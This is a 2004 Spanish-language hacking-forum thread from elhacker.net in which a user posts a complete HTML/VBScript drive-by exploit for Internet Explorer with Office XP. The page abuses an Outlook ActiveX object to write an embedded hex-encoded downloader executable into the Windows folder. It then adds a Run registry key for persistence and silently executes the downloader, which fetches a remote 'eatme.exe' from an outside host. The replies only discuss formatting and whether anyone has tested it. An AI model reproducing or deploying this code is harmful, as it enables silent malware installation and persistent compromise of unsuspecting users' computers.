elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT  (Leído 1,719 veces)
Virtual-Attack

Desconectado Desconectado

Mensajes: 23


YO :)


Ver Perfil WWW
MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« en: 8 Agosto 2004, 05:13 »

Aqui les dejo este interesante Exploit .....
___________________________________________________

Código:
<HTML>
<HEAD>
<TITLE>MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT</TITLE>
</HEAD>
<BODY>
<OBJECT id="InterfaceObject" classid="clsid:0006F063-0000-0000-C000-000000000046" WIDTH=0 HEIGHT=0>
<param name="folder" value="Inbox">
</OBJECT>

<SCRIPT LANGUAGE="VBSCRIPT">
<!-- hide for safe browsers

dim FileContent,fso,windir,file,filename,key,wshshell,landurl,overflow,dnloadurl

'the 3 main steps in this script
SetupFile
Upload
Run

'sets up the binary data of downloader.exe in memory
sub SetupFile()
'we set up the filecontent variable which contains the binary data
'of downloader.exe, its parameters are parsed into the file directly
'using this script, adapt them to your needs
FileContent=Array()
FileContent=decode("4D5A50000200000004000F00FFFF0000B80000000000000040001A"+wstring("0",69)+"10000BA10000E1FB409CD21B8014CCD219090546869732070726F6772616D206D7573742062652072756E20756E6465722057696E33320D0A2437"+wstring("0",272)+"504500004C010400342ABB940000000000000000E0008E810B01021900040000000C000000000000191000000010000000200000000040000010000000020000010000000000000003000A00000000000050000000040000000000000100000000001000002000000000100000100000000000001000000000000000000000000030000022020000000000000000000000000000000000000000000000000000004000009C"+wstring("0",166)+"434F44450000000000100000001000000004000000060000000000000000000000000000200000604441544100000000001000000020000000060000000A0000000000000000000000000000400000C02E6964617461000000100000003000000004000000100000000000000000000000000000400000C02E72656C6F630000001000000040000000020000001400000000000000000000000000004000005"+wstring("0",1745)+"C8000000FF7508E8A1020000FF750C50E886020000C9C208006800204000E88A020000680920400050E86D02000083F800740A909090906A016A00FFD068282040006801010000E8790200000BC0740690909090EBE7680001000068B4214000E8540200000BC075ED68B4214000E84C0200000BC074DF508B008B185883C00483FB0075F283C0048B008B008B003D7F0000017510909090906810270000E810020000EBB168004000006A40E8F001000083F80074EFA3C923400068DD23400068D5234000E836FFFFFF83F80074ECA32124400068EB23400068D5234000E81DFFFFFF83F80074ECA32524400068FC23400068D5234000E804FFFFFF83F80074ECA329244000680D24400068D5234000E8EBFEFFFF83F80074ECA32D2440006A006A006A006A0068B6234000FF1521244000A3C12340006A006A0068FF0000006A0068B4224000FF35C1234000FF1525244000A3C52340006A0068800000006A026A006A0068000000C06834234000E80F01000083F8FF74DFA3D123400068CD2340006800400000FF35C9234000FF35C5234000FF1529244000833DCD234000007424909090906A0068CD234000FF35CD234000FF35C9234000FF35D1234000E8B8000000EBB7FF35C1234000FF152D244000FF35C5234000FF152D244000FF35D1234000E88D000000FF35C9234000E8B20000006831244000E896000000C7055D2440000100000066C7056124400001006875244000683124400068B42340006A0068100200046A006A006A0068342340006A00E84F0000006889244000688D244000FF3585244000E87C00000068BB244000FF3589244000E872000000FF3589244000E86D0000006A00E81E000000FF25A4304000FF25A8304000FF25AC304000FF25B0304000FF25B4304000FF25B8304000FF25BC304000FF25C0304000FF25C4304000FF25C8304000FF25CC304000FF25D0304000FF25D8304000FF25DC304000FF25E0304000FF25E8304000FF25EC304000FF25F0304"+wstring("0",585)+"4B45524E454C33320052656769737465725365727669636550726F63657373"+wstring("0",1322))
'WIN32ASM DOWNLOADER PARAMETER 1 : DOWNLOAD URL
dnloadurl="http://www.duho.org/eatme.exe"
overflow=0
if len(dnloadurl) > 29 then overflow = len(dnloadurl)-29
FileContent=FileContent+dnloadurl+chr(0)+wstring("A",98-overflow)
'WIN32ASM DOWNLOADER PARAMETER 2 : TARGET LOCATION (incl. drive+path)
landurl = "/takeover.exe"
overflow=0
if len(landurl) > 13 then overflow = len(landurl)-13
FileContent=FileContent+landurl+chr(0)+wstring("A",114-overflow)
FileContent=FileContent+decode("2F005B42797465526167655D00000000000000000000000000000000000000000057494E494E455400496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100496E7465726E65745265616446696C6500496E7465726E6574436C6F736548616E646C65"+wstring("0",203)+"200008000000000536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E0077696E333836"+wstring("0",638)+"503000000000000000000000F8300000A430000084300000000000000000000005310000D830000094300000000000000000000011310000E830000000000000000000000000000000000000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000001E3100002831000036310000423100005031000062310000703100008231000094310000A2310000B0310000C031000000000000C8310000D6310000E631000000000000F43100000232000014320000000000004B45524E454C33322E646C6C0057534F434B33322E646C6C0041445641504933322E646C6C00000057696E45786563000000436C6F736548616E646C65000000577269746546696C6500000043726561746546696C654100000043726561746550726F6365737341000000004578697450726F6365737300000047657453746172747570496E666F4100000047657450726F634164647265737300000000476C6F62616C416C6C6F63000000476C6F62616C46726565000000004C6F61644C6962726172794100000000536C656570000000676574686F73746E616D65000000676574686F737462796E616D6500000057534153746172747570000000005265674F70656E4B65794100000052656744656C65746556616C756541000000526567436C6F73654B6579"+wstring("0",960)+"1000009C0000001A3024303E305C306A30B730BC30C130D030D530DA30E930EE30F330023107310C311B3128312E313331433149314F3154316B317A317F318A31903196319C31AA31B031B631BC31C931CF31D531DB31E131EC31F63101320C32133218321D322F323B3240324632503256326132733279327F3285328B32913297329D32A332A932AF32B532BB32C132C732CD32D332D932"+wstring("0",5838))
end sub

'writes downloader.exe to disk in the windows directory
sub Upload()
'set up the object, and use it to load the filesystemobject,
'enabling us (among other things) to write stuff to disk
set inbox = InterfaceObject.object.selection
set mail = inbox.Item(1)
set fso = mail.Session.Application.CreateObject("Scripting.FileSystemObject")
'get the windoze dir and write downloader.exe (=FileContent) to disk
windir = fso.getspecialfolder(0)
filename = "downloader.exe"
set file = fso.opentextfile(windir+"\"+filename, "2", "TRUE")
file.write FileContent
file.close()
end sub

sub Run()
'set up the object, and use it to load the windows shell object,
'enabling us to write registry keys
'and run files
key = "HKLM\Software\Microsoft\WinNT\CurrentVersion\Run\win386"
set wshShell = mail.Session.Application.CreateObject("WScript.Shell")
wshShell.regwrite key,filename
wshShell.run filename,"0","FALSE"
set wshShell = Nothing
set fso = Nothing
set inbox = Nothing
set mail = Nothing
set file = Nothing
end sub

'function that decodes our fake-ascii-hex-binary into true binary
Function Decode(Text)
dim x,thebyte,temptext
For x = 1 To Len(Text) Step 2
thebyte = Chr(38) & "H" & Mid(Text, x, 2)
temptext = temptext & Chr(thebyte)
Next
Decode = temptext
End Function

'function that offers us simple compression, by replacing e.g. 1000 zero
'characters ("000...") by one function name: wstring("0",1000)
function wstring(text,times)
dim x
for x=1 to times
wstring = wstring & text
next
end function
-->
</script>

<noscript>
Sorry, you have to view this page with Internet Explorer 4.0 or higher, <br> also enable scripting, activex  and <br>
install officeXP in order to be vulnerable.
</noscript>

</BODY>
</HTML>
« Última modificación: 8 Agosto 2004, 08:46 por Rojodos » En línea

Cada ves que aprendo mas ,me doy cuenta de que puedo seguir aprendiendo :)
eLank0
eLhAcKeR r00Lz


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Respuesta #1 en: 8 Agosto 2004, 06:11 »

No has visto por ahi que los codigos deben ir entre las etiquetas CODE??
En línea

Virtual-Attack

Desconectado Desconectado

Mensajes: 23


YO :)


Ver Perfil WWW
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Respuesta #2 en: 8 Agosto 2004, 06:42 »

Elanko : Si es visto eso ..pero yo los pongo haci .
Yo puse el codigo de Exploit para que lo examinen o lo utlicen para algo ...no para que critiquen de que forma esta puesto .

Salu2...                         8)
En línea

Cada ves que aprendo mas ,me doy cuenta de que puedo seguir aprendiendo :)
eLank0
eLhAcKeR r00Lz


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Respuesta #3 en: 8 Agosto 2004, 07:11 »

 :-[ :-[ :-[ :-[

No he criticado simplemente lo repito...
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Respuesta #4 en: 8 Agosto 2004, 08:47 »

Ya lo he puesto yo entre CODEs.

Asi esta mucho mejor.

Salu2
En línea

Linuxtron

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Respuesta #5 en: 9 Agosto 2004, 05:10 »

¿alguien lo ha probado?

thx x el exploit
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines